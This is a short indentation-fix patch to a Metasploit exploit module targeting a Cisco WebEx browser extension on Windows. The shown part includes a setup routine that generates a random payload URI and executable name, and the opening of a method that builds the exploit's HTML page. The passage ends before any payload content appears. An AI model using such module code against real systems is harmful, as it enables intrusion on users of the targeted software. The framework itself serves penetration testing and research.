From e75043f00ee437a372b70e65b266de3becba133e Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sat, 30 Mar 2024 16:50:48 +0300 Subject: [PATCH] Module indentation was wrong --- .../windows/browser/cisco_webex_ext.rb | 58 +++++++++---------- 1 file changed, 29 insertions(+), 29 deletions(-) diff --git a/modules/exploits/windows/browser/cisco_webex_ext.rb b/modules/exploits/windows/browser/cisco_webex_ext.rb index 56adc25c585b..450948db0c0f 100644 --- a/modules/exploits/windows/browser/cisco_webex_ext.rb +++ b/modules/exploits/windows/browser/cisco_webex_ext.rb @@ -44,17 +44,17 @@ def initialize(info={}) 'DisclosureDate' => '2017-01-21', 'DefaultTarget' => 0 )) -end + end -def setup - @payload_uri = "#{Rex::Text.rand_text_alphanumeric(8)}" - @payload_exe = "#{Rex::Text.rand_text_alpha(8)}.exe" - super -end + def setup + @payload_uri = "#{Rex::Text.rand_text_alphanumeric(8)}" + @payload_exe = "#{Rex::Text.rand_text_alpha(8)}.exe" + super + end -def exploit_html(cli, req_uri) - base_uri = "#{get_resource.chomp('/')}" - html = %Q~ + def exploit_html(cli, req_uri) + base_uri = "#{get_resource.chomp('/')}" + html = %Q~